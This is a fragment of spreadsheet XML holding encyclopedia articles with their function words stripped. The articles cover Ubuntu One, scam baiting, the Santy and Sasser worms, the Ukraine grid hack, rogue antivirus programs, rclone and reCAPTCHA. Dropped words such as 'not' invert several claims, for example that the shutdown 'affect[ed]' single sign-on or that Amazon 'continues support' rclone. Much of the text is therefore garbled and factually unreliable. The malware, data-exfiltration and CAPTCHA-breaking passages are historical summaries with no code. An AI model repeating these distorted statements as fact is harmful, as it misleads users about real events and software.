    <t>ubuntu openid-based single sign-on service operated canonical ltd. allow users onto many canonical-owned sites. until april 2014, ubuntu also file hosting service music store allowed users store data cloud". service enabled users store files online sync computers mobile devices, well stream audio music cloud mobile devices. april 2014, canonical announced cloud storage synchronization features would shut july 2014, leaving sign-on features intact. features ubuntu client application ubuntu 9.04 later, windows newer, 10.6 higher. other linux distributions running gnome supported console client. source code available launchpad easily compiled unix-like operating systems freebsd. there ubuntu music devices. free ubuntu account offered storage. ubuntu service similar microsoft onedrive, icloud, dropbox, google play music, amazon cloud player. client code written python. used twisted low-level networking protocol buffers protocol description. data synced custom protocol called "u1storage", stored amazon s3.ubuntu offered automatic upload photos taken android mobile devices immediate synchronization across computers; integration mozilla thunderbird contacts tomboy notes access local couchdb instance. also capabilities purchasing drm-free music synchronizing automatically ubuntu account ubuntu music store partnership 7digital). ubuntu published apis developers wishing build applications file data synchronization music streaming. ubuntu account gave users access canonical store, launchpad, ubuntu ubuntu services; ubuntu account allowed users store files within cloud, store contacts details within interface, access ubuntu music store music activate ubuntu software center. other sites support openid authorization also support ubuntu one. history june 2013, ubuntu single sign account re-branded ubuntu part consolidating canonical's online services ubuntu brand. also, announcement identified ubuntu another service come brand. following security breach july 2013, canonical ubuntu forums brand, meaning forum users using ubuntu one, rather previous username-password system. april 2014, canonical announced shutting select ubuntu services. announcement, longer possible purchase storage space music. file services would unavailable june existing users allowed download content july stored data would permanently deleted. canonical explained willing make investment ubuntu one, would required compete services. instead, priority making "converged operating system phones, tablets, desktops." company also announced plans release source code ubuntu server software public open-source license. shutdown cloud storage synchronization services affect single sign-on function ubuntu one, remain place. july 2014 service shut users' files deleted. august 2015 canonical released file syncing code agpl. some server parts remain released eta. reception ubuntu criticized within ubuntu community using proprietary server software.there native client integration kubuntu variant ubuntu operating system, january 2013. kubuntu integration development also received grant google summer code 2010. further criticism concerned unclear revenue share would granted community. amarok development team announced would support ubuntu music store amarok media player moment, unlike magnatune media store, returns revenue produced interface amarok. storage storage out-sourced amazon files stored ubuntu file stores encrypted. also cloud storage remote backup service comparison file hosting services comparison online backup services ubuntu single sign references external links official website ubuntu documentation ubuntu wiki page ubuntu wiki</t>
  </si>
  <si>
    <t>Scam baiting</t>
  </si>
  <si>
    <t>scam baiting scambaiting) form internet vigilantism primarily used towards advance-fee fraud, impersonation scam, technical support scams, pension scams, consumer financial fraud.scambaiters pose potential victims waste time resources scammers, gather information useful authorities, publicly expose scammers. they document scammers' tools methods, warn potential victims, provide discussion forums, disrupt scammers' devices systems using remote access trojans computer viruses, take fraudulent webpages. some scambaiters motivated sense civic duty, simply engage amusement, combination both. methodology scams conducted written communication, baiters answer scam emails using throwaway email accounts, pretending receptive scammers' offers.popular methods accomplishing first objective scammers fill lengthy questionnaires; bait scammers taking long trips; encourage poorly made props inappropriate english-language idioms surreptitiously cast doubt upon scams.baiters deceive scammers claims ludicrous ones used defraud victims; entrap trojan horses, remote administration tools, enable baiters gain sensitive information damage scammers' computers. baiters publicly humiliate scammers live streaming sessions persuading produce humiliating images colloquially known "trophies". some images uploaded early scam baiting websites described reinforcing racist stereotypes. however, modern scam baiting content primarily centred around education scams work prevent falling victim scams. examples 2004, something awful forum poster asked advice deal bogus escrow scam buyer ebay. since ebay auction apple powerbook another forum poster suggested construct replica powerbook cardboard. buyer, lived overseas, forced several hundred dollars customs claim fake laptop. member scambaiting website 419eater.com able convince scammer send wooden replica commodore 64.in february 2011, belgian television show basta portrayed, hidden cameras, scammer fooled meeting baiters, raising stakes involving one-armed man, dwarves pony. eventually, police raid faked, baiters arrested scammer went free, abandoning money, without suspicion.in january 2014, members 419eater.com appeared segments channel show secrets scammers. first segment scambaiters persuaded scammer travel london remote location cornwall train taxi meet victim (played baiter) collect payment gold deal. second segment female scammer scambaiters posing victims trafalgar square pass fake check. this scammer subsequently questioned police.in 2015 2016, james veitch hosted three talks scambaiting. veitch also presented mashable video series "scamalot" youtube.in march 2020, anonymous youtuber grey hacker alias "jim browning" infiltrated gathered drone cctv footage fraudulent call centre scam operation india help fellow youtube personality karl rock. through british documentary programme panorama, police raid carried documentary brought attention assistant police commissioner karan goel, leading arrest call centre operator amit chauhan, also operated fraudulent travel agency name "faremart travels".youtube twitch popular sources scambaiters educate and/or entertain audience various types scams. also internet vigilantism lenny (bot) prank call sting operation references external links advanced fraud humor curlie "who scams scammers? meet scambaiters". guardian. october 2021.</t>
  </si>
  <si>
    <t>Ubuntu Single Sign On</t>
  </si>
  <si>
    <t>ubuntu single sign (also known ubuntu sso, launchpad login service) openid-based single sign-on service provided canonical allow users many websites. june 2013, canonical announced ubuntu single sign would re-branded ubuntu part consolidating canonical's online services ubuntu brand. product overview ubuntu single sign account gave users access canonical store, launchpad, ubuntu ubuntu services. other sites support openid authorization also support ubuntu sso. ubuntu single sign account could also used authenticating desktop applications "ubuntu music store" plugin rhythmbox banshee, ubuntu ubuntu software center. this goal reached using ubuntu single sign client application. rebranding june 2013, ubuntu single sign account brand rebranded ubuntu brand, consolidating ubuntu user's online experience. users still access canonical store, launchpad, ubuntu one, ubuntu software center ubuntu services; however, lack interest, ubuntu music store plugin rhythmbox removed interface. also ubuntu ubuntu openid references</t>
  </si>
  <si>
    <t>Scalyr</t>
  </si>
  <si>
    <t>dataset inc, formerly known scalyr, inc. server monitoring tools provider based mateo, california. incorporated 2011 founded steve newman, former chief engineer founder writely, whose technology acquired became google docs. christine heckart, company offers integrated suite server monitoring, management, visualization analysis tools aggregates metrics centralized system real time, integrated cloud services. history founder steve newman idea scalyr working google, drawing experience performance-tracking server diagnostic tools. also founded writely 2005, went become google docs.after start 2011, scalyr resorted venture capital expand operations. 2015, company raised $2.1 million seed round susa ventures. investors round bloomberg beta, google ventures, sherpalo ventures othman laraki. acquisition sentinelone february 2021, sentinelone announced acquisition scalyr $155 million cash equity. references</t>
  </si>
  <si>
    <t>Ugress</t>
  </si>
  <si>
    <t>ugress electronica project bergen, norway, main project electronic musician gisle martens meyer (gmm). gisle started music career early 1990s making scream tracker fast tracker modules alias gnosis. among meyer's projects nebular spool, shadow beat ninja9000 well scoring soundtracks moving pictures several tv-shows. ugress released multiple albums, singles, date. their first five albums: resound, released 2002, climbed second place official norwegian chart board. second album, cinematronics, released years later. reached third place list. third ugress album titled unicorn released january 2008. june 2009, ugress released fourth studio album, called reminiscience. collectronics, compilation album including previously unreleased material, released july 2010. ugress notable providing free mp3-versions many songs page pages associated acts like nebular spool. norwegian word ugress means "weeds" (not cannabis). style ugress uses sample snippets various artists, movies particular horror science fiction movies) shows. ugress project gisle martens meyer, actually several different projects uncanny planet records. discography albums resound (2002) passion jeanne d'arc (2003) cinematronics (2004) cowboy desperado (2005) film music (2006) unicorn (2008) reminiscience (2009) collectronics (2010) pushwagner (2011) aelita queen mars (2013) häxan (2016) came from beyond eternal september (2016) wrong future (2018) black anorak (2018) ghoststorm (2019) scavenger royale (2021) singles e-pipe (2000) ugress promo (2001) loungemeister (2002) sophisticated wickedness (2006) retroconnaissance (2006) kosmonaut (2006) chromosome corrupt (2007) loungemeister (2008) schizophonica (2009) reminiscience (2009) loungemeister (2010) re-issue 2002 limited edition slightly different tracklist. planet episode planetfall (2011) planet episode lost ruins (2011) planet episode three wulfhöken spaceport affairs (2011) planet episode four luftslott (2011) planet episode five time machine (2012) planet episode another planet (2013) phantom wuxia codec (2019) static troopers (2019) teddy bears' picnic (2020) door room a.jpg (2020) incandescent structures ambiguity (2020) anemoia (2020) miracle shaolin moonwolf (2020) your apathy important (2020) curse cancelled (2021) miscellaneous vault (2008) compilation unreleased tracks 2000-2007 references external links uncanny planet homepage uncanny records, "motherpage" projects journals blog, updates projects issues postedsub-projects: ugress' official website free mp3s music video downloads shadow beat free mp3s spokelseskladden free mp3s nebular spool free mp3s pixxeltyger free mp3s ninja9000 free mp3s</t>
  </si>
  <si>
    <t>Santy</t>
  </si>
  <si>
    <t>santy computer worm created perl exploit vulnerability phpbb software used google spread across internet. overview within hours release december 2004, 30,000 40,000 websites attacked santy. worm holds record spreading worldwide within three hours release. caused writable files formats .php .html) infected servers display message "this site defaced!!! this site defaced!!! neverevernosanity webworm generation number representing generation worm. there variants worm, alternative search engines google blocked queries santy worm, anti-santy anti-worm attempts patch vulnerable installations.the phpbb group released patch vulnerability month attacks, phpbb 2.0.11. references external links news report patch phpbb kaspersky page santy google search santy infected sites</t>
  </si>
  <si>
    <t>Savukku</t>
  </si>
  <si>
    <t>savukku (english: whip) anonymous, whistle blowing website. website called tamil's wikileaks. site publishes articles tamil english. known leaking sensational spectrum case taped conversation publishing articles corrupt government employees, politicians, judges, journalists socio-political affairs. believed savukku shankar alias achimuthu shankar, former lower division clerk directorate vigilance anti-corruption. february 2014, website blocked madras high court orders writ defamation filed employee, mahalakshmi. different matter, shankar charged sections information technology act, alleged leaked conversation former chief secretary government former director vigilance anti-corruption. acquitted february 2017. overview website publishes articles anonymously, say, corrupt government employees, politicians, judges journalists. started september 2010. give information owner(s) publisher(s) posts website said achimuthu shankar, former lower division clerk directorate vigilance anti-corruption. 2008, shankar allegedly leaked transcript taped conversation upadhyay, director dvac, tripathi, chief secretary state deccan chronicle english daily newspaper. found guilty arrested allegedly subjected third-degree torture swear officers. after released bail, started collecting information right information act, later made blog post make public information gathered. allegedly second arrest shankar, charges road rage. thereafter converted blog website called, savukku expose corruption. first blog post published anonymously website september 2010 presently around posts since including taped conversation.in 2010-2011, aadmi party leader senior advocate prashant bhushan released tapes alleged conversation dravida munnetra kazhagam rajya sabha member kanimozhi tamil nadu police chief intelligence, jaffar sait, said made public website three days earlier.on february 2014, website publicly posted four tapes exposing conversation kanimozhi former additional director general police jaffer sait jaffer sait sharad kumar reddy, former director kalaignar owned karunanidhi. authenticity taped conversation challenged either kanimozhi dravida munnetra kazhagam party. block mahalakshmi, advocate newsreader lodged defamation case website writing personal life, claimed degraded reputation. later filed writ petition madras high court citing inactivity police.on february 2014, madras high court ordered joint secretary, cyber division union department information technology block website within days called affected individuals lodge separate police cases, hearing writ petition filed mahalakshmi. court said that, reputation status less half dozen judges, many advocates, officers stand attacked damaged hands vituperative site. contents posts website grossly demeaning, obnoxious harmful worthy brought print order court." march 2014, following court orders block website, many proxies created evade block. website continued host mirrors site savukku, time naming judge madras high court hearing case. achimuthu shankar achimuthu shankar former lower division clerk directorate vigilance anti-corruption, joined 1991. 2008, allegedly made public sensational information included taped conversation upadhyay, director directorate vigilance anti-corruption, tripathi, chief secretary, deccan chronicle english daily newspaper. following leak sensitive information public, dravida munnetra kazhagam government tamil nadu state appointed commission headed judge shanmugam probe leak. shankar found guilty commission inquiry. however, shankar denied allegations said, charges false contesting courts. also said that, made face third degree torture forced bear witness officials. later released bail.in mid-2010, published blog post information collected right information arrested charges road rage next day. said, "the next arrested false charges road rage. expecting [arrest me]. they disappoint".he later upgraded blog website receiving encouragement readers. 2011, dravida munnetra kazhagam government lost polls form government. shankar opined, even though government, many stuffs related social welfare still reach public. said, even within media corruption. going write will. shankar admirer prabhakaran, chief ltte. website picture prabhakaran side picture cowboy whip side header. continued publish articles along contesting suspension department vigilance anti-corruption. called tamil's julian assange.the website first release tapes ahead prasant bushan. audio conversation between, kalaignar sharad kumar former intelligence chief jaffer sait ips.the website first expose arithmetical errors judgment justice kumarasamy, acquitting selvi jayalalitha, tamil nadu month 2015 arrests january 2014, puducherry-based designer murugaiyan arrested cyber crime police chennai designing website. after days imprisonment, murugaiyan released bail madras high court.on july 2014, following madras high court orders, central crime branch arrested pothi kalimuthu charge hosting website. allegedly website domain located france maintained server located singapore website. officers make request france telecom department telecommunications reveal address owner website domain.in conversation, achimuthu shankar said indian express english newspaper that, kalimuthu online. kalimuthu offered help making website original website blocked court orders refused take money hosting website. protest professor human rights activist said that, necessarily agree contents posted website blocking website unacceptable. affected individuals free take legal action separately.p. sundarajan, lawyer opined that, unfortunate, particular judge refrain hearing case also written website order nothing mockery justice.citizens freedom expression, organisation comprising senior advocates activists said prosecute case behalf website said that, court order serious threat freedom expression.a former tamil employee t.n. gopalan filed madras high court, requesting court resist government blocking website except case described information technology rules, 2009. gopalan said that, expecting block website discovered several scams investigates publishes information public welfare.j. anbazhgan, president chennai union journalists said union believes complaint filed mahalakhsmi accurate related ownership tapes shankar representative union chief minister jayalalitha, provide relief shankar. acquittal savukku shankar acquitted xvii additional sessions court chennai february 2017. shankar charged sections information technology alleged leaked conversation former chief secretary government former director vigilance anti-corruption. references</t>
  </si>
  <si>
    <t>Ukraine power grid hack</t>
  </si>
  <si>
    <t>december 2015, power grid ukraine hacked, resulted power outages roughly 230,000 consumers ukraine hours. attack took place ongoing russo-ukrainian (2014-present) attributed russian advanced persistent threat group known "sandworm". first publicly acknowledged successful cyberattack power grid. description december 2015, hackers remotely compromised information systems three energy distribution companies ukraine temporarily disrupted electricity supply consumers. most affected consumers prykarpattyaoblenergo (ukrainian: прикарпаттяобленерго; servicing ivano-frankivsk oblast): substations 110kv substations 35kv substations) switched off, 230,000 people without electricity period hours.at time, consumers energy distribution companies, chernivtsioblenergo (ukrainian: чернівціобленерго; servicing chernivtsi oblast) kyivoblenergo (ukrainian: київобленерго; servicing kyiv oblast) also affected cyberattack, smaller scale. according representatives companies, attacks conducted computers addresses allocated russian federation. vulnerability 2019, argued ukraine special case, comprising unusually dilapidated infrastructure, high level corruption, ongoing russo-ukrainian war, exceptional possibilities russian infiltration historical links countries. ukrainian power grid built part soviet union, upgraded russian parts 2022), still fixed. russian attackers familiar software operators. furthermore, timing attack holiday season guaranteed skeleton crew ukrainian operators working shown videos). method cyberattack complex consisted following steps: prior compromise corporate networks using spear-phishing emails blackenergy malware seizing scada control, remotely switching substations disabling/destroying infrastructure components (uninterruptible power supplies, modems, rtus, commutators) destruction files stored servers workstations killdisk malware denial-of-service attack call-center deny consumers up-to-date information blackout.at last emergency power utility company’s operations center switched off. total, electricity supplied 0.015% daily electricity consumption ukraine). also industroyer, malware used cyberattack ukraine’s power grid 2016 2017 cyberattacks ukraine russian-ukrainian cyberwarfare cyberwarfare russia references further reading robert lee; michael assante; conway march 2016). analysis cyber attack ukrainian power grid. defense case (pdf). e-isac. nate beach-westmoreland; jake styczynski; scott stables (november 2016). when lights went (pdf). booz allen hamilton. external links gamliel (2017-10-6) "securing smart grid advanced metering infrastructure". andy greenberg (2017-06-20). "how entire nation became russia's test cyberwar". wired. zetter (2016-03-03). "inside cunning, unprecedented hack ukraine's power grid". wired. zetter (2016-01-20). "everything know about ukraine's power plant hack". wired. john hulquist (2016-01-07). "sandworm team ukrainian power authority attacks". fireeye. ics-cert, [https://www.cisa.gov/uscert/ics/advisories/icsa-16-336-02) ics-cert, cyber-attack against ukrainian critical infrastructure (ir-alert-h-16-056-01)</t>
  </si>
  <si>
    <t>Ultimate Defender</t>
  </si>
  <si>
    <t>ultimate defender rogue antivirus program published nous-tech solutions ltd. program considered malware difficult uninstallation deceptive operation. operation program obtained free download. once installed, purports search user's computer viruses spyware. during installation, however, files installed onto computer. these files detected software listed critical threats requiring immediate removal. users prompted upgrade full version software, would capable removing threat despite fact threat installed software. addition purported operation antivirus program, software floods users multiple false security warnings threats security files computer, overwhelming pop-up blockers norton antivirus. software also alter operation screen savers, desktop, desktop icons, directing users software's homepage. removal software related ultimate fixer ultimate cleaner, software extremely difficult remove installed. companies symantec provide detailed instructions removal software, commercial anti-spyware programs unable remove software automatically. external links video youtube references</t>
  </si>
  <si>
    <t>Sasser (computer worm)</t>
  </si>
  <si>
    <t>sasser computer worm affects computers running vulnerable versions microsoft operating systems windows windows 2000. sasser spreads exploiting system vulnerable port. thus particularly virulent spread without user intervention, also easily stopped properly configured firewall downloading system updates windows update. specific hole sasser exploits documented microsoft ms04-011 bulletin, patch released seventeen days earlier. characteristic experience worm shutdown timer appears worm crashing lsass. history effects sasser created april 2004. this worm named sasser spreads exploiting buffer overflow component known lsass (local security authority subsystem service) affected operating systems. worm scans different ranges addresses connects victims' computers primarily port 445. microsoft's analysis worm indicates also spread port 139. several variants called sasser.b, sasser.c, sasser.d appeared within days (with original named sasser.a). lsass vulnerability patched microsoft april 2004 installment monthly security packages, prior release worm. some technology specialists speculated worm writer reverse-engineered patch discover vulnerability, would open millions computers whose operating system upgraded security update.the effects sasser included news agency agence france-presse (afp) satellite communications blocked hours u.s. flight company delta lines cancel several trans-atlantic flights computer systems swamped worm. nordic insurance company finnish owners sampo bank came complete halt close offices finland. british coastguard electronic mapping service disabled hours, goldman sachs, deutsche post, european commission also issues worm. x-ray department lund university hospital four layer x-ray machines disabled several hours redirect emergency x-ray patients nearby hospital. university missouri forced "unplug" network wider internet response worm. author 2004, 18-year-old german sven jaschan rotenburg, lower saxony, student technical college, arrested writing worm. german authorities jaschan partly information obtained response bounty offer microsoft us$250,000. jaschan's friends informed microsoft friend created worm. revealed sasser, also netsky.ac, variant netsky worm, creation. another variation sasser, sasser.e, found circulating shortly arrest. variation attempted remove worms infected computer, much netsky does. jaschan tried minor german courts determined created worm worm released 18th birthday april 2004). sven jaschan found guilty computer sabotage illegally altering data. friday, july 2005, received 21-month suspended sentence. side effects indication worm's infection given existence files c:\win.log, c:\win2.log c:\windows\avserve2.exe pc's hard disk, ftp.exe running randomly 100% usage, well seemingly random crashes shell (export version) caused faulty code used worm. characteristic symptom worm shutdown timer appears worm crashing lsass.exe. workarounds shutdown sequence aborted pressing start using command enter shutdown this aborts system shutdown users continue doing. shutdown.exe file available default within windows 2000, installed windows 2000 resource kit. available windows second option stop worm shutting computer change time and/or date clock earlier; shutdown time move future clock back. also blaster (computer worm) nachia (computer worm) bluekeep (security vulnerability) timeline notable computer viruses worms external links microsoft security bulletin: ms04-011 can-2003-0533 bugtraq 10108 read protect (microsoft security page) includes links info pages major anti-virus companies. windows worm loose (slashdot article) report effects worm german admits creating sasser (bbc news) sasser creator avoids jail term (bbc news)</t>
  </si>
  <si>
    <t>Urstromtaler</t>
  </si>
  <si>
    <t>urstromtaler community currency used landlocked states brandenburg saxony-anhalt side side euro. equates one-to-one euro value accepted several local shops businesses. supporters argue helps promoting local business especially small local shops compete corporate supermarkets chain stores. there regional currencies sprung germany. sometimes argued regiogeld illegal, academics tend regiogeld legal welcome route adapt regional economies globalisation. also chiemgauer references</t>
  </si>
  <si>
    <t>Ultimate Fixer</t>
  </si>
  <si>
    <t>ultimate fixer part spyware program impersonated windows security center. ultimate fixer, along ultimate cleaner ultimate defender, fake security programs windows.</t>
  </si>
  <si>
    <t>Rclone</t>
  </si>
  <si>
    <t>rclone open source, multi threaded, command line computer program manage migrate content cloud high latency storage. capabilities include sync, transfer, crypt, cache, union, compress mount. rclone website lists supported backends including google drive.descriptions rclone often carry strapline rclone syncs files cloud storage. those prior 2020 include alternative rsync cloud storage. users called rclone swiss army knife cloud storage.rclone well known rclone sync rclone mount commands. provides management functions analogous ordinarily used files local disks, tolerate intermittent unreliable service. rclone commonly front-end media servers plex, emby jellyfin stream content direct consumer file storage services.official ubuntu, debian, fedora, gentoo, arch, brew, chocolatey, package managers include rclone. history nick craig-wood inspired rsync. concerns noise power costs arising home computer servers prompted embrace cloud storage began developing rclone open source software 2012 name swiftsync.rclone promoted stable version 1.00 july 2014.in 2017 amazon barred rclone users consumer amazon drive file storage product. amazon drive advertised offering unlimited storage year. amazon blamed security concerns also banned upload utilities. amazon's service continues support rclone users. original rclone logo retired replaced present september 2018.in march 2020 nick craig-wood resigned memset ltd, cloud hosting company founded, focus open source software.amazon's april 2020 public sector blog explained fred hutch cancer research center using rclone motuz tool migrate large biomedical research datasets object stores.in november 2020 rclone updated correct weakness generated passwords. passwords encrypted remotes generated randomly rclone supplied user. versions rclone 1.49.0 1.53.2 seed value generated passwords based number seconds elapsed day, therefore truly random. cve-2020-28924 recommended users upgrade latest version rclone check passwords protecting encrypted remotes.release 1.55 rclone march 2021 included features sponsored cern cs3mesh4eosc project. work funded promote vendor-neutral application programming interfaces protocols synchronisation sharing academic data cloud storage. backends commands rclone supports following services backends. there others, built standard protocols webdav work. webdav backends support rclone functionality dependent server side checksum modtime. remotes usually defined interactively backends, local disk, memory s3), rclone config. rclone wrap remotes alias, chunk, compress, crypt union, remotes. once defined, remotes referenced rclone commands interchangeably local drive. remote names followed colon distinguish local drives. example, remote example_remote containing folder, pseudofolder, myfolder referred within command path example_remote:/myfolder.rclone commands directly apply remotes, mount file access streaming. with appropriate cache options mount addressed conventional, block level disk. commands provided serve remotes sftp, http, webdav, dlna. commands sub-commands flags. filters determine files remote rclone commands applied to.rclone passes commands parameters existing rclone sessions experimental browser interface. crypt remotes rclone's crypt implements encryption files rest cloud storage. layers encrypted remote pre-existing, cloud remote. crypt commonly used encrypt decrypt media, streaming, consumer storage services google drive. rclone's configuration file contains crypt password. password lightly obfuscated, whole rclone.conf file encrypted.crypt either encrypt file content name, additionally full paths. latter case potential clash encryption cloud backends, microsoft onedrive, limited path lengths. crypt remotes encrypt object modification time size. encryption mechanism content, name path available, scrutiny, rclone website. derivation scrypt. example syntax (linux) these examples describe paths file names object keys behave similarly. recursively copy files directory remote_stuff, remote xmpl, directory stuff home folder:- enables logging progress information. default rclone checks file integrity (hash) copy; retry file three times operation interrupted; uses four parallel transfer threads, apply bandwidth throttling. running command copies changed files remote local folder but, like default rsync behaviour, delete local directory, files removed remote. additionally delete files local folder removed remote like behaviour rsync --delete flag:- delete files source transferred local directory like behaviour rsync --remove-source-file flag:- mount remote directory mountpoint pre-existing, empty stuff directory home directory (the ampersand makes mount command background process):- default rclone syntax modified. alternative transfer, filter, conflict backend specific flags available. performance choices include number concurrent transfer threads; chunk size; bandwidth limit profiling, cache aggression. example syntax (windows) these examples describe paths file names object keys behave similarly. recursively copy files directory remote_stuff, remote xmpl, directory stuff drive:- enables logging progress information. default rclone checks file integrity (hash) copy; retry file three times operation interrupted; uses four parallel transfer threads, apply bandwidth throttling. running command copies changed file remote local directory delete local directory. additionally delete files removed remote also local directory:- delete files source transferred local directory:- mount remote directory unused drive letter, mountpoint existent directory:- default rclone syntax modified. alternative transfer, filter, conflict backend specific options available. performance choices include number concurrent transfer threads; chunk size; bandwidth limit profiling, cache aggression. academic evaluation 2018, university kentucky researchers published conference paper comparing rclone command line, cloud data transfer agents data. paper published result funding national science foundation.later year, university utah's center high performance computing examined impact rclone options data transfer rates. rclone research sites examples university maryland, iowa state university, trinity college dublin, nyu, byu, indiana university, finland, utrecht university, university nebraska, university utah, north carolina state university, stony brook, tulane university, washington state university, georgia tech, national institutes health, wharton, yale, harvard, minnesota, michigan state, case western reserve university, university south dakota, northern arizona university, university pennsylvania, stanford, university southern california, santa barbara, irvine, berkeley, surfnet. rclone cybercrime 2020 reports stated rclone used hackers exploit diebold nixdorf atms prolock ransomware. issued flash alert mi-000125-mw 2020 relation compromise. they issued further, related alert 20200901–001 september 2020. attackers exfiltrated encrypted data organisations involved healthcare, construction, finance, legal services. multiple government agencies, industrial entities affected. researchers established hackers spent month exploring breached networks, using rclone archive stolen data cloud storage, encrypting target system. reported targets included lasalle county, city novi sad.the warned january 2021, private industry notification 20210106–001, extortion activity using egregor ransomware rclone. organisations worldwide threatened public release exfiltrated data. cases rclone disguised name svchost. bookseller barnes noble, retailer kmart, games developer ubisoft vancouver metro system reported victims.an april 2021 cybersecurity investigation sonicwall zero-day vulnerability snwlid-2021-0001 fireeye's mandiant team established attackers unc2447 used rclone reconnaissance exfiltration victims' files. cybersecurity infrastructure security agency analysis report ar21-126a confirmed rclone fivehands ransomware attacks.a june 2021 microsoft security intelligence twitter post identified rclone bazacall cyber attacks. miscreants sent emails encouraging recipients contact bogus call centre cancel paid service. call centre team instructed victims download hostile file installed malware target network, ultimately allowing rclone covert extraction potentially sensitive data. rclone wars 2021 star wars blog article, managed security service provider canary announced rclone wars, allusion clone wars. post notes illicit legitimate file transfer utilities exfiltrate extort schemes focuses megasync, megacmd rclone. identify renamed rclone executables compromised devices authors suggest monitoring distinctive rclone level commands command line flag strings remote: rclone rsync rsync transfers files computers rsync installed. operates block, rather file, level delta algorithm needs transfer changes files. rsync preserves file attributes permissions. rclone wider range content management capabilities, types backend address, works whole file object level. currently preserve permissions attributes. rclone designed tolerance intermittent unreliable connections remote services. transfers optimised high latency networks. rclone decides whole files objects transfer obtaining checksums, compare, remote server. where checksums available, rclone object size timestamp.rsync single threaded. rclone multi threaded user definable number simultaneous transfers.rclone pipe data completely remote locations, sometimes without local download. during rsync transfer, side must local drive.rclone ignores trailing slashes. rsync requires correct use. rclone filters require refer contents directory. rsync not.eponymous cloud storage service rsync.net provides remote unix filesystems customers rsync standard unix tools. they also offer rclone accounts.in 2016, poster hacker news summarised rclone's relationship rsync as:- (rclone) exists give rsync things rsync. want rsync things rsync, rsync. also rsync references external links official website</t>
  </si>
  <si>
    <t>UltimateCleaner</t>
  </si>
  <si>
    <t>ultimatecleaner 2007 rogue anti-spyware program created fake windows security messages security warnings order trick users believing computer infected spyware threats needed purchase full version ultimatecleaner 2007 remove threat. also category:spyware removal programs find remove spyware computer surveillance adware malware trojan horse (computing) notes references information removal instructions ultimatecleaner non-techie removal guide ultimatecleaner</t>
  </si>
  <si>
    <t>ReCAPTCHA</t>
  </si>
  <si>
    <t>recaptcha captcha system enables hosts distinguish human automated access websites. original version asked users decipher hard read text match images. version also asked users decipher text match images analysis cookies canvas rendering suggested page downloaded automatically. since version recaptcha never interrupt users intended automatically users load pages click buttons. recaptcha owned google. original iteration service mass collaboration platform designed digitization books, particularly illegible scanned computers. verification prompts utilized pairs words scanned pages, known word used control verification, second used crowdsource reading uncertain word. recaptcha originally developed luis ahn, david abraham, manuel blum, michael crawford, maurer, colin mcmillen, edison carnegie mellon university's main pittsburgh campus. acquired google september 2009. system helped digitize archives york times, subsequently used google books similar purposes.the system reported displaying million captchas every day, sites facebook, ticketmaster, twitter, 4chan, cnn.com, stumbleupon, craigslist (since june 2008), u.s. national telecommunications information administration's digital converter coupon program website part transition).in 2014, google pivoted service away original concept, focus reducing amount user interaction needed verify user, presenting human recognition challenges (such identifying images satisfy specific prompt) behavioral analysis suspects user bot. origin distributed proofreaders first project volunteer time decipher scanned text could read optical character recognition (ocr) programs. works project gutenberg digitize public domain material uses methods quite different recaptcha. recaptcha program originated guatemalan computer scientist luis ahn, aided macarthur fellowship. early captcha developer, realized unwittingly created system frittering away, ten-second increments, millions hours precious resource: human brain cycles". operation recaptcha (human-assisted ocr) scanned text subjected analysis different ocrs. word deciphered differently programs english dictionary marked "suspicious" converted captcha. suspicious word displayed, context, sometimes along control word already known. human types control word correctly, response questionable word accepted probably valid. enough users correctly type control word, incorrectly type second word failed recognize, digital version documents could containing incorrect word. identification performed program given value points, interpretation human given full point. once given identification hits points, word considered valid. those words consistently given single identity human judges later recycled control words. first three guesses match match either ocrs, considered correct answer, word becomes control word. when users reject word correct spelling chosen, word discarded unreadable.the original recaptcha method designed show questionable words separately, out-of-context correction, rather use, within phrase five words original document. also, control word might mislead context second word, request "/metal/ /fife/" entered "metal file" logical connection filing metal tool considered common musical instrument "fife".in 2012, recaptcha began using photographs taken google street view project, addition scanned words. user identify images crosswalks, street lights, objects. some online speculated data used google's self-driving company, waymo. however, confirmed case.google charges recaptcha websites make million recaptcha queries month. captcha recaptcha (v2+) 2013, recaptcha began implementing behavioral analysis browser's interactions predict whether user human bot. following year, google began deploy recaptcha api, featuring captcha recaptcha" users deemed risk need click single checkbox verify identity. captcha still presented system uncertain user's risk; google also introduced type captcha challenge designed accessible mobile users, user must select images matching specific prompt grid.in 2017, google introduced "invisible" recaptcha, verification occurs background, challenges displayed user deemed risk. according former google "click fraud czar" shuman ghosemajumder, capability "creates sort challenge advanced bots still around, introduces less friction legitimate human."recaptcha declared end-of-life shut march 2018. implementation recaptcha tests displayed central site recaptcha project, supplies words deciphered. this done javascript server making callback recaptcha request submitted. recaptcha project provides libraries various programming languages applications make process easier. recaptcha free-of-charge service provided websites assistance decipherment, recaptcha software open-source.also, recaptcha offers plugins several web-application platforms including asp.net, ruby, php, ease implementation service. security main purpose captcha system block spambots allowing human users. december 2009, jonathan wilkins released paper describing weaknesses recaptcha allowed bots achieve solve rate 18%.on august 2010, chad houck gave presentation hacking conference detailing method reverse distortion added images allowed computer program determine valid response time. recaptcha system modified july 2010, houck speak method. houck modified method described "easier" captcha determine valid response 31.8% time. houck also mentioned security defenses system, including high-security lockout invalid response given times row.on 2012, adam, jeffball dc949 gave presentation layerone hacker conference detailing able achieve automated solution accuracy rate 99.1%. their tactic techniques machine learning, subfield artificial intelligence, analyse audio version recaptcha available visually impaired. google released version recaptcha hours talk, making major changes audio visual versions service. release, audio version increased length seconds seconds, much difficult understand, humans well bots. response update following one, members dc949 released versions stiltwalker beat recaptcha accuracy 60.95% 59.4% respectively. after successive break, google updated recaptcha within days. according dc949, often reverted features previously hacked. june 2012, claudia cruz, fernando uceda, leobardo reyes published paper showing system running recaptcha images accuracy 82%. authors said system solve recent recaptcha images, although claim work intelligent robust some, changes image database. august 2012 presentation given bsideslv 2012, dc949 called latest version "unfathomably impossible humans" able solve manually either. accessibility organization webaim reported 2012, "over respondents [screen reader users] find captcha somewhat difficult." criticism original iteration recaptcha criticized source unpaid work assist transcribing efforts.google profits recaptcha users free workers improve research. privacy current iteration system criticized reliance tracking cookies promotion vendor lock-in google services; administrators encouraged include recaptcha tracking code pages website analyze behavior "risk" users, determines level friction presented recaptcha prompt used. google stated privacy policy user data collected manner used personalized advertising. also discovered system favors active google account login, displays higher risk towards using anonymizing proxies services.concerns raised regarding privacy google announced recaptcha v3.0, allows google track users non-google websites.in april 2020, cloudflare switched recaptcha hcaptcha, citing privacy concerns google's potential data recollect recaptcha targeted advertising operating costs since considerable portion cloudflare's customers free, non-paying customers. response, google told magazine data recaptcha never used personalized advertising purposes. accessibility google's help center states recaptcha supported deafblind community, 